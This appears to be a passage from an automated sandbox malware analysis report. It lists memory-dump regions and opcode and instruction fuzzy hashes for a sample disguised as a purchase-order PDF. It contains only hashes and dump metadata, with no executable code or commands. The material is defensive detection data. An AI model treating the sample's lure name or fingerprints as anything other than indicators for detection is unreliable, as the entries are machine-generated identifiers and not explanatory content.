                                                                                • Opcode ID: 8c7fc3e84111305d7f5fbe3da66f83db14892b1f401ce33ae7eee2a7bb8b90cc
                                                                                • Instruction ID: 7423ab82ca1ad214298525bc70530356b25d9fee9ee085ed8be96c8b29772965
                                                                                • Opcode Fuzzy Hash: 8c7fc3e84111305d7f5fbe3da66f83db14892b1f401ce33ae7eee2a7bb8b90cc
                                                                                • Instruction Fuzzy Hash: 76411231F002299FCB58DB28A5106BF77A2BBD4310B24C969D5158B298EF34DC42E7C1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2c9393ab005847228cb31d7786655121bfd889ab4178b9129f417836b9d051dc
                                                                                • Instruction ID: 8dfe91207305402026cbc3a1189c13b1bc8549ffcb20362e451736c9d82a007d
                                                                                • Opcode Fuzzy Hash: 2c9393ab005847228cb31d7786655121bfd889ab4178b9129f417836b9d051dc
                                                                                • Instruction Fuzzy Hash: 84418372A0416DDFCB10CF68E881B7EBBB2FF89300F614469E9129B251C3389E41EB51
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3fbed2b8d6a062204e9ca231cf53428d69bc44c98bedb3a5c0b8f6bd61b56d7c
                                                                                • Instruction ID: 5c7daf03bc8e4cd894659ff9e4e306137d9496e763eb1727294165e1a0b0f27c
                                                                                • Opcode Fuzzy Hash: 3fbed2b8d6a062204e9ca231cf53428d69bc44c98bedb3a5c0b8f6bd61b56d7c
                                                                                • Instruction Fuzzy Hash: F541BDB0D097988FCB41DF68D8587ADBFF1EF46300F5484AAD044AB292D7784A48DF52
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b02d866a00e378b151312e5ca15d96b483d7f06b818ed75c1c79c0287866e78b
                                                                                • Instruction ID: a94665a3b1ac0ec96ae8ede5c4469fb74b43e2ff86be05528c85af671dadfea8
                                                                                • Opcode Fuzzy Hash: b02d866a00e378b151312e5ca15d96b483d7f06b818ed75c1c79c0287866e78b
                                                                                • Instruction Fuzzy Hash: 72416071A006298FCB14DBBCD144AADBBF2EF88310F158069E40AEB352DF749D81DB95
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 41861382c3ea47cbc5134f8e25bd9eb5cf33e56af854cd353d1f6c370f2fc3c7
                                                                                • Instruction ID: 77ca83a276ac6b91c3ffc92fb9d15798a4beab7e91b9d5a675abe4f4a1dec022
                                                                                • Opcode Fuzzy Hash: 41861382c3ea47cbc5134f8e25bd9eb5cf33e56af854cd353d1f6c370f2fc3c7
                                                                                • Instruction Fuzzy Hash: C7419331E142498FCB05DFB8C8446EEBBB2EF89310F5585A6D405E72A1DB34A945CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7495c704b35a77ad2da6f845bdc63d757f80508592b3e4a0ffc01ce9be435298
                                                                                • Instruction ID: 5e0520ab387dc6bb12c3ad5fa2c09a32eb2e2a89dd3f5d7cfdfb4a47b553320c
                                                                                • Opcode Fuzzy Hash: 7495c704b35a77ad2da6f845bdc63d757f80508592b3e4a0ffc01ce9be435298
                                                                                • Instruction Fuzzy Hash: FA319335F042249FDB58DB28B61477E37B2FBD5311B248579D8169B298DB34DC02E782
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0cd90dfb62259abdfc82e865bb1f3cccfad33563deda45e3d3b830441fd587d2
                                                                                • Instruction ID: 772ad61fc080d82e495ee9fbdc69a714f2fb90f89260330372d8bf41d3bd5ac7
                                                                                • Opcode Fuzzy Hash: 0cd90dfb62259abdfc82e865bb1f3cccfad33563deda45e3d3b830441fd587d2
                                                                                • Instruction Fuzzy Hash: 9641E370A01618CFDB58DFA9C884B9DBBF2BF49304F2085A9D509AB265E7356E85CF01
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d1db338521cb8125073b426c97339685a522cb4d07459be2fac6ccbefd60fd78
                                                                                • Instruction ID: 8677b0d0b9fd794afef868dca27d07b799848383f4f65586042fa1758827222a
                                                                                • Opcode Fuzzy Hash: d1db338521cb8125073b426c97339685a522cb4d07459be2fac6ccbefd60fd78
                                                                                • Instruction Fuzzy Hash: 4B313773A092958FCF15CF64C818AEEBFB19F89310F1845AAD446EB292DB315D09CB81
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1853a73208a21e81094c81baedd3fe854786bc51c83bfaf9710391c1562c1781
                                                                                • Instruction ID: 11fc344ce7101b0d79a3a5348d3fdfefeac79cb1fe3025519dccb29b886d1bed
                                                                                • Opcode Fuzzy Hash: 1853a73208a21e81094c81baedd3fe854786bc51c83bfaf9710391c1562c1781
                                                                                • Instruction Fuzzy Hash: 3221053270C361FEF7E18A78BC4836A7BC4EB55364F14493AE446C66D0E26ADC40A361
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 45b2341c0a27b5bdcdeca3ff6b7c31b6c0e4b44fee92588dc46b46fc4d1fcf68
                                                                                • Instruction ID: 57350d66ae58525c691e019dc8dc70071a777c2fc4d01e25ae2c0acc561c4fcc
                                                                                • Opcode Fuzzy Hash: 45b2341c0a27b5bdcdeca3ff6b7c31b6c0e4b44fee92588dc46b46fc4d1fcf68
                                                                                • Instruction Fuzzy Hash: DF31CD72E041599FCB15DBA8D840A9EFBF2EFC9310B14816BD846EB216DB30AD458B91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 882cc65557eaef9bc47269f2c8467ff4f7e5870fd2f649732655d05ad788ae85
                                                                                • Instruction ID: cfcf4e2d825706c13c6e37658919c9c0103ec92dba93609619303e9f90d4f505
                                                                                • Opcode Fuzzy Hash: 882cc65557eaef9bc47269f2c8467ff4f7e5870fd2f649732655d05ad788ae85
                                                                                • Instruction Fuzzy Hash: 563157B0D00218DFDB14CFA9D580AEEBFF6AF48314F248029E808AB350DB749941CFA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 75ffc8651e67b69b734648c7173407b237b896733cd5a1f44ab3347d0e98aee0
                                                                                • Instruction ID: 04400e653daac92d7b8a0dbe44d6e18d120aa322b5247db01f4089ac3b9b3ff0
                                                                                • Opcode Fuzzy Hash: 75ffc8651e67b69b734648c7173407b237b896733cd5a1f44ab3347d0e98aee0
                                                                                • Instruction Fuzzy Hash: B521B771A042458FCB24DF79C844A9EBBF5EF88360B244A6EE48AD7361DB319D44CB50
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217514766.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c7d000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a17304d805d94c57f3270f103a6865e092c1aead61e5db9acc3287670d829c6e
                                                                                • Instruction ID: cbfa0928b2fdf98613b349bc875c066af776bd881f66159553cd7f3e78876b3f
                                                                                • Opcode Fuzzy Hash: a17304d805d94c57f3270f103a6865e092c1aead61e5db9acc3287670d829c6e
                                                                                • Instruction Fuzzy Hash: BE21FFB1504204DFCB05DF14D980F2ABF76FF98324F20C969E90E0B256C33AD856DAA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a8026207ef39ea14850d5807a2e9e39e6203626679fdf9aa7259b52669f88eb6
                                                                                • Instruction ID: c000b23bf7cc363b19851f1e42cfeca62ec80569183519ed44063cebb373fccf
                                                                                • Opcode Fuzzy Hash: a8026207ef39ea14850d5807a2e9e39e6203626679fdf9aa7259b52669f88eb6
                                                                                • Instruction Fuzzy Hash: 56312BB0D05618DFDB84DFA8D0487AEBBF2FB49304FA0C4AAE509A3244D7784A45EF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217569660.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c9d000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d688115160f6db787465d3660625ca448117a2c32ba4be5d66a46a8b73d9b883
                                                                                • Instruction ID: 258e6c338706eba5515ded2b3dd36e17338d45c08dd3260a9db88c0c4893987e
                                                                                • Opcode Fuzzy Hash: d688115160f6db787465d3660625ca448117a2c32ba4be5d66a46a8b73d9b883
                                                                                • Instruction Fuzzy Hash: A1213776104240DFCF15DF14D9C8B2ABF65FB98324F20C569E90A1B246C33AD84AD7B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 051eb22d8333962cc50f3811b73549b7f0053591f6f7c55b49f7cfe4125fc6ac
                                                                                • Instruction ID: aca4ac774a18015c5037045df73fec9e23433fb49bb5ace3d59042e19fddee07
                                                                                • Opcode Fuzzy Hash: 051eb22d8333962cc50f3811b73549b7f0053591f6f7c55b49f7cfe4125fc6ac
                                                                                • Instruction Fuzzy Hash: 82216670E0120DDFCB05DFA9D8446AEBBB2EF8A300F10886AD115B7295EB386945DF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c2661977b4bbcce64ee6cc2b93399a16e2c50cb8e87c310d038b275c40c466cd
                                                                                • Instruction ID: 634bfa0d5083b494c896b8daf68623be8d52cac88800fb9d7b7c7d50a47188bd
                                                                                • Opcode Fuzzy Hash: c2661977b4bbcce64ee6cc2b93399a16e2c50cb8e87c310d038b275c40c466cd
                                                                                • Instruction Fuzzy Hash: 1D31E7B0E06258CFDB58CF99C484B9DBBF2BB49304F608996D409EB254E775AD85CF01
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 23a8241b5b143bd2579198ea7fec0a4393478a46f7d4005163c46cb1fafefbb5
                                                                                • Instruction ID: 86fbb1121164d5d02bcd86ecd18b44ccb5390942d8ebdcb9f2c79f163bf01484
                                                                                • Opcode Fuzzy Hash: 23a8241b5b143bd2579198ea7fec0a4393478a46f7d4005163c46cb1fafefbb5
                                                                                • Instruction Fuzzy Hash: 82217A70E0120EDBCB04DFA9D4447AEBBF2FB8A300F108965D115B3285EB346944DF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e989a8098d73aa6ba2a9d40dd854f7f86cac17b7b8b2ad871311f937f00e1005
                                                                                • Instruction ID: cfc296ca41c00c2d09d1e5db0c389b3b7ddd4cc49f821febd96781e68476ddd1
                                                                                • Opcode Fuzzy Hash: e989a8098d73aa6ba2a9d40dd854f7f86cac17b7b8b2ad871311f937f00e1005
                                                                                • Instruction Fuzzy Hash: A831E070902699CBDB24DF58D844BECB7B1FB45308F009A9AD51AB3250D775AAC4CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4c2dca6f6ee0f7fe9bfd481b57205781f0580773adb2cdfff8c39660e866b1fe
                                                                                • Instruction ID: 821358c06859e6123cf44c08e6ddb47ba0f76a03703d96221aade01372087fc6
                                                                                • Opcode Fuzzy Hash: 4c2dca6f6ee0f7fe9bfd481b57205781f0580773adb2cdfff8c39660e866b1fe
                                                                                • Instruction Fuzzy Hash: AC213A3490A248EFC745CFB8D8905ACBFB5EF46300F2085DAD844D7352DA35AE42DBA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8b04aa551a60160ebad3149c816215c3084e8ce011fde48a64ca593506dfb7b3
                                                                                • Instruction ID: 127773ea9b013f741d163474697f3de002ab1370212ec54ddd3f190924c68d3d
                                                                                • Opcode Fuzzy Hash: 8b04aa551a60160ebad3149c816215c3084e8ce011fde48a64ca593506dfb7b3
                                                                                • Instruction Fuzzy Hash: CC21C975A002499FCB04DFB9D8495AEBBB2EFC5300B1085A5D505EB365DB30AE05CF91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9e546ee5071982256db4b105c61c5f96a3ee7d3601eee727f19b039602bdc858
                                                                                • Instruction ID: 6d6f35a0e64aa45851c0c6ba27b2eb20a9f40cc06dad940ed53cdb1aa5a5477b
                                                                                • Opcode Fuzzy Hash: 9e546ee5071982256db4b105c61c5f96a3ee7d3601eee727f19b039602bdc858
                                                                                • Instruction Fuzzy Hash: 9E213831A00629CFCB14DBA8D184A9CF7F2EF48324F05C069E815AB252CB34EC81DF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 51d291887d427c19fa5cf635474d2c3bc1fd5c017e4c9e29fe83e5a7f1370a8f
                                                                                • Instruction ID: f24629130bd478093bea3410c450ef4485c2f117b8b8e0d34e89fc4a82e207f2
                                                                                • Opcode Fuzzy Hash: 51d291887d427c19fa5cf635474d2c3bc1fd5c017e4c9e29fe83e5a7f1370a8f
                                                                                • Instruction Fuzzy Hash: 9C110A71E112158FCB44DFA8D548AADBBF2FF48300F5584A9E405EB262DB3899419F50
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1088b45114a30cb0b151af3f7666c6bbc70d02337d48680bb15d994132d8b809
                                                                                • Instruction ID: 8fd9b1f97fb83d74909ab491984e5fde3750c9223194b5da8b4dd0400dfabb91
                                                                                • Opcode Fuzzy Hash: 1088b45114a30cb0b151af3f7666c6bbc70d02337d48680bb15d994132d8b809
                                                                                • Instruction Fuzzy Hash: CE115179A0010A9FCB04DFB9D8499AEB7B6EF89301B108565D505A7355DF31AE01CF91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217514766.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c7d000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction ID: 8b1611d0dc0bbeaf1b33deab446323f07b7f99f12cff082253f5777ba79c9aa1
                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
• Instruction Fuzzy Hash: 3711AF76504244CFCB06CF10D5C4B16BF72FB98314F24C6A9E9490B256C33AD95ACBA2
Memory Dump Source
• Source File: 00000000.00000002.2255218343.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_72c0000_Order88983273293729387293828PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3ef41155071266a248e1e0abd0203160927e4c128e1cef5e02502d2ce620cd18
• Instruction ID: ef80e0a5515c5c7cb9d3ca53b6c81178ffbbd3319ecdf2cb424429d6af22d46f
• Opcode Fuzzy Hash: 3ef41155071266a248e1e0abd0203160927e4c128e1cef5e02502d2ce620cd18
• Instruction Fuzzy Hash: 80315478A002688FDBA4DF18C994AD9FBF2AF49304F5080D6E80DA7355E7349E85DF41
Memory Dump Source
• Source File: 00000000.00000002.2217569660.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c9d000_Order88983273293729387293828PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
• Instruction ID: b8abbe2865c130f5e0262efce7018e0a7391e194c578a864772d77ea5b8f0b8d
• Opcode Fuzzy Hash: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
• Instruction Fuzzy Hash: 5C11E676504280CFDF12CF14D9C4B1ABF72FB84324F24C5A9D9091B656C336D95ADBA2
Memory Dump Source
• Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 19a88ae82db917295b5d75bca7fd5d4fb75eb3299e7085942c2d56ae05619fe9
• Instruction ID: 6863adab841f97e4e1e2085ed5860364552eee1f4d70e16cb4ff022cc9cc6de3
• Opcode Fuzzy Hash: 19a88ae82db917295b5d75bca7fd5d4fb75eb3299e7085942c2d56ae05619fe9
• Instruction Fuzzy Hash: 87118E35B00518CFEB18DF98E858BAC77B0FF54310F214025E502AB3A0C7759D46AB49
Memory Dump Source
• Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 02f3859f43d7551b32443818aaef9930c968f37f1a4628f649918348372608cf
• Instruction ID: 6ba517ebb37109c46229fa6db0538de9b38b2dbffbbecba47f7d12abb9e4c937
• Opcode Fuzzy Hash: 02f3859f43d7551b32443818aaef9930c968f37f1a4628f649918348372608cf
• Instruction Fuzzy Hash: 9401F27A704124BFD7545A99AC48F6AB6D6EB88360F204436F60AC7391CA309C12A3A2
Memory Dump Source
• Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 775831d141a0fbb06bc0c944006cd48a064c0cc14e15cd50b50b10dbac26cf4d
• Instruction ID: d2282b2d2fae6ca3a71715baa2eb2b12e5cb94eadf546c6b104316147ca3a291
• Opcode Fuzzy Hash: 775831d141a0fbb06bc0c944006cd48a064c0cc14e15cd50b50b10dbac26cf4d
• Instruction Fuzzy Hash: 8B01D479B04124BFD7915768AC49F7E7AD2EF88340F244435F606D73A2CA748C02A793
Memory Dump Source
• Source File: 00000000.00000002.2255218343.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_72c0000_Order88983273293729387293828PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e4928cce0c0af6703826c717b9dee512823701502107c627cdd41e06bba565d
• Instruction ID: c66dfba38a54092fdbeda4d8efda5312b5d277befa07674578d2faff4a0dc846
• Opcode Fuzzy Hash: 4e4928cce0c0af6703826c717b9dee512823701502107c627cdd41e06bba565d
• Instruction Fuzzy Hash: AD215970A50219CFCBA8DF28C9989E9B7B2FB89301F1151DADA0EA7750DB305E819F40
Memory Dump Source
• Source File: 00000000.00000002.2255218343.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_72c0000_Order88983273293729387293828PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a3be08d292579a035a016eb2ebde4a925299932d06fdc132f5050ab57709f022
• Instruction ID: bb6e9377ea80cf020b617e8f0258cda8422520cbe85ed0b7055fa4af7d4b5a7c
• Opcode Fuzzy Hash: a3be08d292579a035a016eb2ebde4a925299932d06fdc132f5050ab57709f022
• Instruction Fuzzy Hash: 0D11DAB8A04229CFC764DF58D8985D9B7F1EB89301F1081E6E919A3745D7309E85CF41
Memory Dump Source
• Source File: 00000000.00000002.2217514766.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c7d000_Order88983273293729387293828PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5921c0908ef7dd09c51c450507c50e6e0d20fad7dd4afffad7d97e3d106a4758
• Instruction ID: dd08b5bbfdbbba21e92a54e9ed530bcc25541bb7481dd3627dfdfc0967973c59
• Opcode Fuzzy Hash: 5921c0908ef7dd09c51c450507c50e6e0d20fad7dd4afffad7d97e3d106a4758
• Instruction Fuzzy Hash: 7601296100E3C09ED7128B258894A52BFB8EF53224F1DC5DBD9998F2A3C2695849C772
Memory Dump Source
• Source File: 00000000.00000002.2217514766.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c7d000_Order88983273293729387293828PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d2d2d1cf1269c0268c795bd7e0b32746c0311819f260f890af58cf3ae4a84f5a
• Instruction ID: 36159503ebe479bcd259ec4da174d7994bf8697c07fa64b30663a43cad3bc6b6
• Opcode Fuzzy Hash: d2d2d1cf1269c0268c795bd7e0b32746c0311819f260f890af58cf3ae4a84f5a
• Instruction Fuzzy Hash: 7E01DB71404344DED7208A26CD84B67BFACEF56324F18C529ED5E0B286C6799941C6B5
Memory Dump Source
• Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dc767202a881ac4bc346ce1ff511fb32677a486b1ffdeef90e0ea0cf7d5bf3a6
• Instruction ID: a33c4ab7cf6f03f19685c378b87ffb1ba6165326ebef45109bd8bb9a75b4f20e
• Opcode Fuzzy Hash: dc767202a881ac4bc346ce1ff511fb32677a486b1ffdeef90e0ea0cf7d5bf3a6
• Instruction Fuzzy Hash: BA017C3190524AAFCF019F98CC008EDBF75EF4A310F04C55AE94867252D731A5A5DBA1
Memory Dump Source
• Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9b484fc0b10e56508cc6aa345e52a38b466e4ec6fafd526ee4cad7c55c2e841f
• Instruction ID: 04df76d7d800670acff85c1b650aeb63b7bd2834c19dac710260e4412601eb6b
• Opcode Fuzzy Hash: 9b484fc0b10e56508cc6aa345e52a38b466e4ec6fafd526ee4cad7c55c2e841f
